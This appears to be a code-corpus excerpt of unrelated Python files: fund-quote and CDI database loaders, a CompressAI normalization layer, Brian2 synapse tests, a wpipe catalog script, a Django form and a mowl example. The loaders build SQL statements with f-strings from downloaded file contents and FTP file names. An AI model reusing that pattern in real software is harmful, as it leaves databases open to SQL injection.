    Loads the file with the new quotes into the ``quotas`` table.

    Quotes of funds absent from the active register are discarded, and the
    month covered by each csv is deleted first so re-downloads do not
    duplicate rows.

    Parameters
    ----------
    file_data : bytes
        Raw download: a zip archive of csvs, or a single csv.
    zip_or_csv : str
        Either 'zip' or 'csv'.

    Returns
    -------
    None.

    """
    active = pd.read_sql("SELECT cnpj FROM inf_cadastral", conn)['cnpj']
    if zip_or_csv == 'zip':
        zip_file = zipfile.ZipFile(io.BytesIO(file_data))
        # dict with all csv files
        files_dict = {}
        for i in range(len(zip_file.namelist())):
            files_dict[zip_file.namelist()[i]] = zip_file.read(zip_file.namelist()[i])
    else:
        files_dict = {'any_name': file_data }
    for key in files_dict.keys():
        df = pd.read_csv(io.BytesIO(files_dict[key]), sep=';', header=0, encoding='latin-1')
        df.columns = df.columns.str.lower()
        df = df.rename(columns={'cnpj_fundo': 'cnpj', 'dt_comptc': 'date', 'vl_quota': 'quota'})
        # Keep only funds present in the active register.
        df = df[df['cnpj'].isin(list(active))]
        df = df[['cnpj', 'date', 'quota']]
        # Each csv covers one month: wipe that month before inserting.
        year = df['date'].str[:4].unique()[0]
        month = df['date'].str[5:7].unique()[0]
        db.execute(f"""DELETE FROM quotas
                   WHERE SUBSTR(date, 1, 4) = '{year}' AND
                   SUBSTR(date, 6, 2) = '{month}'""")
        df.to_sql('quotas', conn, if_exists='append', index=False)
    conn.commit()
    return
def update_cdi():
    """
    Updates the CDI (Brazilian reference rate).

    Downloads any CDI file from the CETIP ftp that is not yet recorded in
    the ``files`` table, storing the daily rate and its daily
    capitalisation factor (252 business days per year).

    Returns
    -------
    None.

    """
    # Files in the ftp:
    url = 'ftp://ftp.cetip.com.br/MediaCDI/'
    req = urllib.request.Request(url)
    r = urllib.request.urlopen(req)
    # The listing comes back as one bytes blob; flatten it into a plain
    # whitespace-separated string before splitting into names.
    text = str(r.read())
    text = text.replace('\\n', ' ')
    text = text.replace('\\r', '')
    text = text.replace("b'", "")
    text = text.replace("'", "")
    text = text.split()
    available_files = []
    for file_name in text:
        if file_name[-4:] == '.txt':
            available_files.append(file_name)
    # Files in the database:
    db_files = pd.read_sql("SELECT * FROM files", conn)
    db_files = db_files['file_name'].to_list()
    # check if the file is new, process and update files table
    for file in available_files:
        if file not in db_files:
            # Empty the temp folder before downloading the next file.
            for fl in os.listdir(os.path.join('data', 'temp')):
                os.remove(os.path.join('data', 'temp', fl))
            file_url = f"ftp://ftp.cetip.com.br/MediaCDI/{file}"
            wget.download(file_url, os.path.join('data', 'temp'))
            with open(os.path.join('data', 'temp', file), 'r') as content:
                cdi = int(content.readline()) / 100
            # Daily capitalisation factor assuming 252 business days/year.
            d_factor = ((cdi / 100) + 1) ** (1 / 252)
            # The filename starts with the date as YYYYMMDD.
            date = datetime.datetime.strptime(file[:8], '%Y%m%d')
            db.execute(f"""INSERT INTO cdi
                       VALUES ('{date}', {cdi}, {d_factor})""")
            # These files are not updated by the provider (cetip.com.br).
            # Because of that, the last_modified is not important, and set to 1900-01-01
            db.execute(f"""INSERT INTO files
                       VALUES ('{file}', '1900-01-01')""")
            conn.commit()
            print("CDI file " + file + " downloaded successfully.")
    return
def update_pipeline():
    """Run the full update sequence, bootstrapping the schema on first use."""
    # The presence of the 'quotas' table doubles as the schema-exists marker.
    probe = "SELECT name FROM sqlite_master WHERE type='table' AND name='quotas';"
    if db.execute(probe).fetchone() is None:
        create_tables()
    update_register()
    update_quotes()
    update_cdi()
    return
| 2.84375 | 3 |
libuvs/uvs_errors.py | kouritron/uvs | 0 | 12762500 | <gh_stars>0
## UVSError handling guidelines:
# 1- don't use OOP exceptions, NEVER NEVER NEVER use inheritance in exceptions
# i dont like exception X that inherits from Y and 2mrw is a G then suddenly catches an F blah blah
# doing the above makes it harder not easier to figure out what the hell happened.
# just use one exception class. return a descriptive msg as to what happened. and if more specificity is needed
# associate an error code with that exception and enumerate the errors
# (i.e. 1 means permission denied, 2 means mac failed ..... ) this is so far not needed.
# if it were needed we could add something like a uvs_error_no field to this class and enumerate
# the different error codes in this module.
# (python shamefully has no constants but there is trick to be done with properties, and raise Error on set
# that pretty much gives us the same thing as language enforced constants, google it)
#
# 2- exceptions are not return values, dont ever use exceptions to communicate results from a sub-routine.
# exceptions are meant to indicate a catastrophic situation that required an immediate termination
# to whatever was happening. for example if a key was not found do NOT raise an exception, return None
# an exception must terminate something. sometimes it should terminate the process. sometimes
# it terminates a thread, sometimes it should terminate a web request. its not a return value.
# it should be used like golang's panic call.
#
#
class UVSError(Exception):
    """Single catch-all exception type for uvs.

    Per the guidelines above: one flat exception class, no inheritance
    hierarchies; describe the failure in the message.
    """
| 3.171875 | 3 |
compressai/layers/gdn.py | Conzel/CompressAI | 515 | 12762501 | <reponame>Conzel/CompressAI<filename>compressai/layers/gdn.py
# Copyright (c) 2021-2022, InterDigital Communications, Inc
# All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted (subject to the limitations in the disclaimer
# below) provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# * Neither the name of InterDigital Communications, Inc nor the names of its
# contributors may be used to endorse or promote products derived from this
# software without specific prior written permission.
# NO EXPRESS OR IMPLIED LICENSES TO ANY PARTY'S PATENT RIGHTS ARE GRANTED BY
# THIS LICENSE. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND
# CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT
# NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A
# PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
# OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
# OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch import Tensor
from compressai.ops.parametrizers import NonNegativeParametrizer
__all__ = ["GDN", "GDN1"]
class GDN(nn.Module):
    r"""Generalized Divisive Normalization layer.
    Introduced in `"Density Modeling of Images Using a Generalized Normalization
    Transformation" <https://arxiv.org/abs/1511.06281>`_,
    by <NAME>, <NAME>, and <NAME>, (2016).
    .. math::
       y[i] = \frac{x[i]}{\sqrt{\beta[i] + \sum_j(\gamma[j, i] * x[j]^2)}}
    """
    def __init__(
        self,
        in_channels: int,
        inverse: bool = False,
        beta_min: float = 1e-6,
        gamma_init: float = 0.1,
    ):
        super().__init__()
        beta_min = float(beta_min)
        gamma_init = float(gamma_init)
        self.inverse = bool(inverse)
        # Reparametrization keeps beta strictly positive (>= beta_min)
        # during optimization.
        self.beta_reparam = NonNegativeParametrizer(minimum=beta_min)
        beta = torch.ones(in_channels)
        beta = self.beta_reparam.init(beta)
        self.beta = nn.Parameter(beta)
        # gamma starts as gamma_init * identity: initially each channel is
        # normalized only by its own energy.
        self.gamma_reparam = NonNegativeParametrizer()
        gamma = gamma_init * torch.eye(in_channels)
        gamma = self.gamma_reparam.init(gamma)
        self.gamma = nn.Parameter(gamma)
    def forward(self, x: Tensor) -> Tensor:
        # x is expected to be 4-D (N, C, H, W); the unpack fixes the rank.
        _, C, _, _ = x.size()
        beta = self.beta_reparam(self.beta)
        gamma = self.gamma_reparam(self.gamma)
        gamma = gamma.reshape(C, C, 1, 1)
        # A 1x1 convolution implements the per-pixel channel-mixing sum
        # beta[i] + sum_j gamma[j, i] * x[j]^2.
        norm = F.conv2d(x ** 2, gamma, beta)
        # inverse=True multiplies by sqrt(norm) instead of dividing by it.
        if self.inverse:
            norm = torch.sqrt(norm)
        else:
            norm = torch.rsqrt(norm)
        out = x * norm
        return out
class GDN1(GDN):
    r"""Simplified GDN layer (absolute value, no square root).
    Introduced in `"Computationally Efficient Neural Image Compression"
    <http://arxiv.org/abs/1912.08771>`_, by <NAME>, <NAME>, <NAME>, and <NAME>, (2019).
    .. math::
        y[i] = \frac{x[i]}{\beta[i] + \sum_j(\gamma[j, i] * |x[j]|}
    """
    def forward(self, x: Tensor) -> Tensor:
        # Same scheme as GDN.forward, but |x| replaces x**2 and the
        # square root is dropped entirely.
        num_channels = x.size(1)
        beta = self.beta_reparam(self.beta)
        gamma = self.gamma_reparam(self.gamma)
        gamma = gamma.reshape(num_channels, num_channels, 1, 1)
        norm = F.conv2d(x.abs(), gamma, beta)
        if not self.inverse:
            norm = torch.reciprocal(norm)
        return x * norm
| 1.125 | 1 |
json_dbindex/models.py | peopledoc/django-json-dbindex | 3 | 12762502 | <reponame>peopledoc/django-json-dbindex<gh_stars>1-10
# No models for this app
| 1.0625 | 1 |
tests/sort_test.py | spencerpomme/pyalgolib | 0 | 12762503 | <reponame>spencerpomme/pyalgolib<filename>tests/sort_test.py
from algorithms.sort import Comparison
from algorithms.sort import NonComparison
if __name__ == "__main__":
    # Smoke-test entry point: exercise one comparison-based sort and one
    # non-comparison sort. NOTE(review): both are called on the class with
    # no arguments -- presumably class/static methods; confirm in algorithms.sort.
    Comparison.bubble_sort()
    NonComparison.radix_sort()
| 1.554688 | 2 |
src/offchainapi/tests/test_status_logic.py | LuZhang-Lou/off-chain-reference | 0 | 12762504 | # Copyright (c) The Libra Core Contributors
# SPDX-License-Identifier: Apache-2.0
from ..protocol import VASPPairChannel
from ..status_logic import Status, KYCResult, State, InvalidStateException
from ..payment_command import PaymentCommand, PaymentLogicError
from ..business import BusinessForceAbort, BusinessValidationFailure
from os import urandom
from ..payment import PaymentObject, StatusObject, PaymentActor, PaymentAction
from ..libra_address import LibraAddress
from ..asyncnet import Aionet
from ..storage import StorableFactory
from ..payment_logic import PaymentProcessor
from ..utils import JSONFlag
from ..errors import OffChainErrorCode
from .basic_business_context import TestBusinessContext
from unittest.mock import MagicMock
from mock import AsyncMock
import pytest
import copy
@pytest.fixture
def payment():
    """Build a fresh PaymentObject with both actors in Status.none."""
    addr_sender = LibraAddress.from_bytes("lbr", b'B' * 16, b'b' * 8)
    addr_receiver = LibraAddress.from_bytes("lbr", b'A' * 16, b'a' * 8)
    actor_sender = PaymentActor(addr_sender.as_str(), StatusObject(Status.none))
    actor_receiver = PaymentActor(addr_receiver.as_str(), StatusObject(Status.none))
    action = PaymentAction(5, 'TIK', 'charge', 7784993)
    # Reference id: on-chain sender address plus a random hex suffix.
    ref_id = f'{LibraAddress.from_encoded_str(addr_sender.get_onchain_encoded_str())}_{urandom(16).hex()}'
    return PaymentObject(
        actor_sender, actor_receiver, ref_id, None,
        'Human readable payment information.', action
    )
def test_SINIT(payment):
    """SINIT (sender needs_kyc_data): extra KYC data on either side is invalid."""
    payment.sender.change_status(StatusObject(Status.needs_kyc_data))
    assert State.from_payment_object(payment) == State.SINIT
    payment2 = payment.new_version()
    payment2.sender.add_additional_kyc_data("additional_kyc")
    with pytest.raises(InvalidStateException):
        State.from_payment_object(payment2)
    payment3 = payment.new_version()
    payment3.receiver.add_additional_kyc_data("additional_kyc")
    with pytest.raises(InvalidStateException):
        State.from_payment_object(payment3)
def test_RSEND(payment):
    """RSEND: sender extra KYC keeps the state; receiver extra KYC is invalid."""
    payment.sender.change_status(StatusObject(Status.needs_kyc_data))
    payment.receiver.change_status(StatusObject(Status.ready_for_settlement))
    assert State.from_payment_object(payment) == State.RSEND
    payment2 = payment.new_version()
    payment2.sender.add_additional_kyc_data("additional_kyc")
    assert State.from_payment_object(payment2) == State.RSEND
    payment3 = payment.new_version()
    payment3.receiver.add_additional_kyc_data("additional_kyc")
    with pytest.raises(InvalidStateException):
        State.from_payment_object(payment3)
    payment4 = payment2.new_version()
    payment4.receiver.add_additional_kyc_data("additional_kyc")
    with pytest.raises(InvalidStateException):
        State.from_payment_object(payment4)
def test_RABORT(payment):
    """RABORT: sender extra KYC is tolerated; receiver extra KYC is invalid."""
    payment.sender.change_status(StatusObject(Status.needs_kyc_data))
    payment.receiver.change_status(StatusObject(Status.abort, "", ""))
    assert State.from_payment_object(payment) == State.RABORT
    payment2 = payment.new_version()
    payment2.sender.add_additional_kyc_data("additional_kyc")
    assert State.from_payment_object(payment2) == State.RABORT
    payment3 = payment.new_version()
    payment3.receiver.add_additional_kyc_data("additional_kyc")
    with pytest.raises(InvalidStateException):
        State.from_payment_object(payment3)
def test_SABORT(payment):
    """SABORT: extra KYC data on either side leaves the state unchanged."""
    payment.sender.change_status(StatusObject(Status.abort, "", ""))
    payment.receiver.change_status(StatusObject(Status.ready_for_settlement))
    assert State.from_payment_object(payment) == State.SABORT
    payment2 = payment.new_version()
    payment2.sender.add_additional_kyc_data("additional_kyc")
    assert State.from_payment_object(payment2) == State.SABORT
    payment3 = payment.new_version()
    payment3.receiver.add_additional_kyc_data("additional_kyc")
    assert State.from_payment_object(payment3) == State.SABORT
def test_READY(payment):
    """READY: both ready_for_settlement; extra KYC data is tolerated."""
    payment.sender.change_status(StatusObject(Status.ready_for_settlement))
    payment.receiver.change_status(StatusObject(Status.ready_for_settlement))
    assert State.from_payment_object(payment) == State.READY
    payment2 = payment.new_version()
    payment2.sender.add_additional_kyc_data("additional_kyc")
    assert State.from_payment_object(payment2) == State.READY
    payment3 = payment.new_version()
    payment3.receiver.add_additional_kyc_data("additional_kyc")
    assert State.from_payment_object(payment3) == State.READY
def test_RSOFT(payment):
    """RSOFT: receiver soft_match; receiver extra KYC data is invalid here."""
    payment.sender.change_status(StatusObject(Status.needs_kyc_data))
    payment.receiver.change_status(StatusObject(Status.soft_match))
    assert State.from_payment_object(payment) == State.RSOFT
    payment3 = payment.new_version()
    payment3.receiver.add_additional_kyc_data("additional_kyc")
    with pytest.raises(InvalidStateException):
        State.from_payment_object(payment3)
def test_SSOFTSEND(payment):
    """SSOFTSEND: sender supplied extra KYC after a receiver soft match."""
    payment.sender.change_status(StatusObject(Status.needs_kyc_data))
    payment.receiver.change_status(StatusObject(Status.soft_match))
    payment.sender.add_additional_kyc_data("additional_kyc")
    assert State.from_payment_object(payment) == State.SSOFTSEND
    payment2 = payment.new_version()
    payment2.receiver.add_additional_kyc_data("additional_kyc")
    with pytest.raises(InvalidStateException):
        State.from_payment_object(payment2)
def test_SSOFT(payment):
    """SSOFT: sender soft_match while receiver is ready_for_settlement."""
    payment.sender.change_status(StatusObject(Status.soft_match))
    payment.receiver.change_status(StatusObject(Status.ready_for_settlement))
    assert State.from_payment_object(payment) == State.SSOFT
    payment2 = payment.new_version()
    payment2.sender.add_additional_kyc_data("additional_kyc")
    # NOTE(review): this re-asserts the unchanged `payment`, not `payment2`,
    # so it duplicates the assertion above -- likely a copy-paste slip;
    # confirm the expected state of `payment2` and assert on it instead.
    assert State.from_payment_object(payment) == State.SSOFT
def test_RSOFTSEND(payment):
    """RSOFTSEND: receiver supplied extra KYC after a sender soft match."""
    payment.sender.change_status(StatusObject(Status.soft_match))
    payment.receiver.change_status(StatusObject(Status.ready_for_settlement))
    payment.receiver.add_additional_kyc_data("additional_kyc")
    assert State.from_payment_object(payment) == State.RSOFTSEND
    payment2 = payment.new_version()
    payment2.sender.add_additional_kyc_data("additional_kyc")
    # NOTE(review): asserts the unchanged `payment` rather than `payment2`,
    # making this a dead assertion -- likely should check `payment2`; confirm.
    assert State.from_payment_object(payment) == State.RSOFTSEND
| 1.789063 | 2 |
src/design_patterns/strategy/application_runner.py | schuna/design-patterns-python | 0 | 12762505 | from design_patterns.strategy.fahrenheit_celsius_strategy import ConverterStrategy
class ApplicationRunner:
    """Drive an application through its init / idle-loop / cleanup lifecycle."""

    def __init__(self, application):
        # The application must expose init(), idle(), cleanup() and a
        # boolean `done` attribute that ends the idle loop.
        self.application = application

    def run(self):
        """Run the application until it reports that it is done."""
        app = self.application
        app.init()
        while not app.done:
            app.idle()
        app.cleanup()


if __name__ == '__main__':  # pragma: no cover
    ApplicationRunner(ConverterStrategy()).run()
| 2.5625 | 3 |
scratch/test_dir3/process_catalogs.py | benw1/WINGS | 4 | 12762506 | #! /usr/bin/env python
import argparse,os,subprocess
from wpipe import *
from wingtips import WingTips as wtips
from wingtips import time, np, ascii
def register(PID, task_name):
    """Create task `task_name` in pipeline `PID` and attach its trigger masks."""
    pipeline = Pipeline.get(PID)
    task = Task(task_name, pipeline).create()
    # Fire on the task's own 'start' event and on any 'new_catalog' event.
    _t = Task.add_mask(task, '*', 'start', task_name)
    _t = Task.add_mask(task, '*', 'new_catalog', '*')
    return
def process_catalog(job_id, event_id, dp_id=None):
    """Build per-filter STIPS input lists from a newly delivered star catalog.

    Parameters
    ----------
    job_id : int
        wpipe Job id running this task.
    event_id : int
        Event that fired this task; its options carry the catalog's dp_id.
    dp_id : int, optional
        Dataproduct id passed on the command line. The catalog dp_id is
        actually read from the event options; this parameter is accepted so
        the 3-argument call in the __main__ block works (the original
        definition only took two arguments).
    """
    myJob = Job.get(job_id)
    myPipe = Pipeline.get(int(myJob.pipeline_id))
    catalogID = Options.get('event', event_id)['dp_id']
    # was DataProduct.get(int(cat_id)): 'cat_id' was never defined
    catalogDP = DataProduct.get(int(catalogID))
    myTarget = Target.get(int(catalogDP.target_id))
    myConfig = Configuration.get(int(catalogDP.config_id))
    myParams = Parameters.getParam(int(myConfig.config_id))
    fileroot = str(catalogDP.relativepath)
    filename = str(catalogDP.filename)  # For example: 'h15.shell.5Mpc.in'
    # Copy the catalog into the processing directory. The original had
    # stdout=subprocess.PIPE *inside* the argv list (a SyntaxError).
    _t = subprocess.call(['cp', fileroot + '/' + filename,
                          myTarget.relativepath + '/proc_' + myConfig['name'] + '/.'],
                         stdout=subprocess.PIPE)
    fileroot = myTarget.relativepath + '/proc_' + myConfig['name'] + '/'
    #filternames = myParams[filternames]
    filternames = ['Z087', 'Y106', 'J129', 'H158', 'F184']
    #ZP_AB = myParams[ZP_AB]
    ZP_AB = np.array([26.365, 26.357, 26.320, 26.367, 25.913])
    # 'infile' was undefined in the original; the catalog file name encodes
    # the distance, e.g. 'h15.shell.5Mpc.in' -> 5.0. TODO confirm the
    # distance will come from the config instead.
    infile = filename
    dist = float(infile.split('.')[2][:-3])  # We will have it in the config
    starpre = '_'.join(infile.split('.')[:-1])
    data = ascii.read(fileroot + infile)
    RA, DEC, M1, M2, M3, M4, M5 = \
        data['col1'], data['col2'], data['col3'], data['col4'],\
        data['col5'], data['col6'], data['col7']
    M = np.array([M1, M2, M3, M4, M5]).T
    stips_inputs = []
    for j, filt in enumerate(filternames):
        outfile = starpre + '_' + filt[0] + '.tbl'
        flux = wtips.get_counts(M[:, j], ZP_AB[j], dist=dist)
        # This makes a stars only input list
        wtips.from_scratch(flux=flux,
                           ra=RA, dec=DEC,
                           outfile=fileroot + outfile)
        _dp = DataProduct(filename=outfile,
                          relativepath=fileroot,
                          group='proc', subtype='star_cat',
                          configuration=myConfig).create()
        stars = wtips([fileroot + outfile])
        galaxies = wtips([fileroot + filt + '_galaxies.txt'])  # this file will be provided pre-made
        galaxies.flux_to_Sb()                     # galaxy flux to surface brightness
        radec = galaxies.random_radec_for(stars)  # random RA DEC across star field
        galaxies.replace_radec(radec)             # distribute galaxies across starfield
        stars.merge_with(galaxies)                # merge stars and galaxies list
        outfile = 'Mixed' + '_' + outfile
        stars.write_stips(fileroot + outfile, ipac=True)
        if j == 0:
            # Record the field center once. The original read
            # 'COnfiguration.addParam(... ' with a missing closing paren.
            Configuration.addParam(myConfig, 'RA', str(stars.center[0]))
            Configuration.addParam(myConfig, 'DEC', str(stars.center[1]))
        # Prepend the STIPS header to the merged table in place.
        with open(fileroot + outfile, 'r+') as f:
            content = f.read()
            f.seek(0, 0)
            f.write('\\type = internal' + '\n' +
                    '\\filter = ' + str(filt) + '\n' +
                    '\\center = (' + str(stars.center[0]) +
                    ' ' + str(stars.center[1]) + ')\n' +
                    content)
        _dp = DataProduct(filename=outfile,
                          relativepath=fileroot,
                          group='proc', subtype='stips_input',  # comma was missing here
                          configuration=myConfig).create()
        stips_inputs.append(_dp.dp_id)
    event = Job.getEvent(myJob, 'new_stips_input',
                         options={'dp_id': stips_inputs,
                                  'to_run': int(len(stips_inputs)),
                                  'completed': 0})
    # This will start N run_stips jobs, one for each dp_id
    # Event.fire(event)
    Event.run_complete(Event.get(int(event_id)))
    _parent = Options.get('event', event_id)
    to_run, completed = int(_parent['to_run']), int(_parent['completed'])
    # was 'if !(completed<to_run):' -- '!' is not valid Python
    if not completed < to_run:
        event = Job.getEvent(myJob, 'process_catalogs_completed')
        # Event.fire(event)
    return None
def parse_all():
    """Build and parse the command-line arguments for this task script."""
    parser = argparse.ArgumentParser()
    parser.add_argument('--R', '-R', dest='REG', action='store_true',
                        help='Specify to Register')
    # The remaining options only differ by flag/dest/type/help text.
    option_specs = [
        (('--P', '-p'), dict(type=int, dest='PID', help='Pipeline ID')),
        (('--N', '-n'), dict(type=str, dest='task_name',
                             help='Name of Task to be Registered')),
        (('--E', '-e'), dict(type=int, dest='event_id', help='Event ID')),
        (('--J', '-j'), dict(type=int, dest='job_id', help='Job ID')),
        (('--DP', '-dp'), dict(type=int, dest='dp_id', help='Dataproduct ID')),
    ]
    for flags, kwargs in option_specs:
        parser.add_argument(*flags, **kwargs)
    return parser.parse_args()
if __name__ == '__main__':
    args = parse_all()
    if args.REG:
        # Registration mode: create the task and its masks, no processing.
        _t = register(int(args.PID),str(args.task_name))
    else:
        job_id = int(args.job_id)
        event_id = int(args.event_id)
        dp_id = int(args.dp_id)
        # NOTE(review): process_catalog is defined above with two parameters
        # but invoked here with three -- confirm the intended signature.
        process_catalog(job_id,event_id,dp_id)
        # placeholder for additional steps
    print('done')
| 2.078125 | 2 |
brian2/tests/features/synapses.py | rgerkin/brian2 | 1 | 12762507 | <gh_stars>1-10
from __future__ import print_function
from __future__ import absolute_import
'''
Check that the features of `Synapses` are available and correct.
'''
from brian2 import *
from brian2.tests.features import FeatureTest, InaccuracyError
import numpy
class SynapsesPre(FeatureTest):
    # Feature test: a presynaptic action ('V += 1') delivered one-to-one
    # from a spiking driver group G to a passive target group H.
    category = "Synapses"
    name = "Presynaptic code"
    tags = ["NeuronGroup", "run",
            "Synapses", "Presynaptic code"]
    def run(self):
        tau = 5*ms
        # Each neuron in G ramps at its own rate k/tau and fires when V>1.
        eqs = '''
        dV/dt = k/tau : 1
        k : 1
        '''
        G = NeuronGroup(10, eqs, threshold='V>1', reset='V=0')
        G.k = linspace(1, 5, len(G))
        H = NeuronGroup(10, 'V:1')
        S = Synapses(G, H, on_pre='V += 1')
        S.connect(j='i')  # one-to-one wiring
        self.H = H
        run(101*ms)
    def results(self):
        # H.V counts how many spikes each source neuron delivered.
        return self.H.V[:]
    compare = FeatureTest.compare_arrays
class SynapsesPost(FeatureTest):
    # Mirror of SynapsesPre: the spiking group G is the *post*synaptic side,
    # and 'V_pre += 1' pushes the effect back onto the silent group H.
    category = "Synapses"
    name = "Postsynaptic code"
    tags = ["NeuronGroup", "run",
            "Synapses", "Postsynaptic code"]
    def run(self):
        tau = 5*ms
        eqs = '''
        dV/dt = k/tau : 1
        k : 1
        '''
        G = NeuronGroup(10, eqs, threshold='V>1', reset='V=0')
        G.k = linspace(1, 5, len(G))
        H = NeuronGroup(10, 'V:1')
        S = Synapses(H, G, on_post='V_pre += 1')
        S.connect(j='i')  # one-to-one wiring
        self.H = H
        run(101*ms)
    def results(self):
        return self.H.V[:]
    compare = FeatureTest.compare_arrays
class SynapsesSTDP(FeatureTest):
    """STDP feature test: an all-to-all plastic network driven by a spike
    generator; records synaptic weights, voltages and the spike count."""
    category = "Synapses"
    name = "STDP"
    tags = ["NeuronGroup", "Threshold", "Reset", "Refractory",
            "run",
            "Synapses", "Postsynaptic code", "Presynaptic code",
            "SpikeMonitor", "StateMonitor",
            "SpikeGeneratorGroup",
            ]
    def run(self):
        n_cells = 100
        n_recorded = 10
        numpy.random.seed(42)  # fixed seed so results are comparable across targets
        taum = 20 * ms
        taus = 5 * ms
        Vt = -50 * mV
        Vr = -60 * mV
        El = -49 * mV
        fac = (60 * 0.27 / 10)
        gmax = 20*fac
        dApre = .01
        taupre = 20 * ms
        taupost = taupre
        dApost = -dApre * taupre / taupost * 1.05
        dApost *= 0.1*gmax
        dApre *= 0.1*gmax
        connectivity = numpy.random.randn(n_cells, n_cells)
        # numpy.random.random_integers was removed from NumPy; randint with
        # an exclusive upper bound draws from the same [0, n_cells-1] range.
        sources = numpy.random.randint(0, n_cells, 10*n_cells)
        # Only use one spike per time step (to rule out that a single source neuron
        # has more than one spike in a time step)
        times = numpy.random.choice(numpy.arange(10*n_cells), 10*n_cells,
                                    replace=False)*ms
        v_init = Vr + numpy.random.rand(n_cells) * (Vt - Vr)
        eqs = Equations('''
        dv/dt = (g-(v-El))/taum : volt
        dg/dt = -g/taus : volt
        ''')
        P = NeuronGroup(n_cells, model=eqs, threshold='v>Vt', reset='v=Vr', refractory=5 * ms)
        Q = SpikeGeneratorGroup(n_cells, sources, times)
        P.v = v_init
        P.g = 0 * mV
        # on_pre/on_post keywords for consistency with SynapsesPre/SynapsesPost
        # above (the old pre=/post= spellings are deprecated in Brian 2).
        S = Synapses(P, P,
                     model = '''dApre/dt=-Apre/taupre : 1 (event-driven)
                        dApost/dt=-Apost/taupost : 1 (event-driven)
                        w : 1''',
                     on_pre = '''g += w*mV
                        Apre += dApre
                        w = w + Apost''',
                     on_post = '''Apost += dApost
                        w = w + Apre''')
        S.connect()
        S.w = fac*connectivity.flatten()
        T = Synapses(Q, P, model = "w : 1", on_pre="g += w*mV")
        T.connect(j='i')
        T.w = 10*fac
        spike_mon = SpikeMonitor(P)
        state_mon = StateMonitor(S, 'w', record=np.arange(n_recorded))
        v_mon = StateMonitor(P, 'v', record=np.arange(n_recorded))
        self.state_mon = state_mon
        self.spike_mon = spike_mon
        self.v_mon = v_mon
        run(0.2 * second, report='text')
    def results(self):
        # (weights over time, voltages over time, total spike count)
        return self.state_mon.w[:], self.v_mon.v[:], self.spike_mon.num_spikes
    def compare(self, maxrelerr, res1, res2):
        w1, v1, n1 = res1
        w2, v2, n2 = res2
        FeatureTest.compare_arrays(self, maxrelerr, w1, w2)
        FeatureTest.compare_arrays(self, maxrelerr, v1, v2)
        FeatureTest.compare_arrays(self, maxrelerr, array([n1], dtype=float),
                                   array([n2], dtype=float))
if __name__=='__main__':
    # Manual smoke run of the two simple feature tests (STDP excluded).
    for ftc in [SynapsesPre, SynapsesPost]:
        ft = ftc()
        ft.run()
        print(ft.results())
| 2.4375 | 2 |
update.py | Sssumika/lianjia | 0 | 12762508 | import json, os
# Column labels every listing record must carry; records missing a key get
# it backfilled with an empty string so downstream consumers see a uniform schema.
labels = ['ID', '标题', '副标题', '总价', '总价单位', '均价', '小区名称', '所在区域', '房屋户型', '所在楼层', '建筑面积', '户型结构', '套内面积', '建筑类型',
          '房屋朝向', '建筑结构', '装修情况', '梯户比例', '配备电梯', '产权年限', '挂牌时间', '交易权属', '上次交易', '房屋用途', '房屋年限', '产权所属', '抵押信息',
          '房本备件', '房源标签', '税费解析', '交通出行', '核心卖点', '别墅类型', '售房详情', '周边配套', '小区介绍', '户型介绍', '装修描述', '权属抵押', '适宜人群',
          '投资分析']
path1 = "data/"
path2 = "data2/"
files = os.listdir(path1)
for i in files:
    # Read/write explicitly as UTF-8: the records contain Chinese text and the
    # platform default encoding (e.g. cp936 on Windows) would break the round trip.
    with open(path1 + i, 'r', encoding='utf-8') as file:
        tmp = json.load(file)
    for record in tmp:
        for key in labels:
            # add the key with an empty value only when it is absent
            record.setdefault(key, '')
    with open(path2 + i, 'w', encoding='utf-8') as file:
        json.dump(tmp, file)
| 2.359375 | 2 |
Blog/apps/articles/forms.py | singhabhigkp77/Django-Blog | 0 | 12762509 | from django.forms import ModelForm
from .models import Post
# Create the form class.
class ArticleForm(ModelForm):
    """ModelForm for creating/editing a blog Post."""

    class Meta:
        model = Post
        fields = ['title', 'text', 'created_date']

    def clean(self):
        """Run the standard ModelForm cleaning and return the cleaned data.

        The previous override discarded the return value; Django's form
        validation docs say an overridden ``clean()`` should return
        ``self.cleaned_data`` (or the superclass result).
        """
        cleaned_data = super().clean()
        return cleaned_data
| 2.40625 | 2 |
mowl/examples/wro.py | bio-ontology-research-group/OntoML | 0 | 12762510 | <filename>mowl/examples/wro.py
#!/usr/bin/env python
import click as ck
import numpy as np
import pandas as pd
import pickle
import gzip
import os
import sys
import logging
logging.basicConfig(level=logging.INFO)
sys.path.insert(0, '')
sys.path.append('../../')
from mowl.datasets import PPIYeastDataset
from mowl.graph.walking_rdf_and_owl.model import WalkRdfOwl
@ck.command()
def main():
    # Click entry point: train Walking-RDF-and-OWL embeddings on the
    # PPI yeast dataset. Hyperparameters are set to small trial values
    # (the commented numbers are the full-scale settings).
    logging.info(f"Number of cores detected: {os.cpu_count()}")
    ds = PPIYeastDataset()
    model = WalkRdfOwl(ds, 'walk_rdf_corpus.txt', 'walk_rdf_embeddings.wordvectors',
                       number_walks = 10, #500,
                       length_walk = 5,# 40,
                       embedding_size= 10, #256,
                       window = 5,
                       min_count = 5,
                       data_root = "../data")
    model.train()
    # relations = ['has_interaction']
    # model.evaluate(relations)
if __name__ == '__main__':
    main()
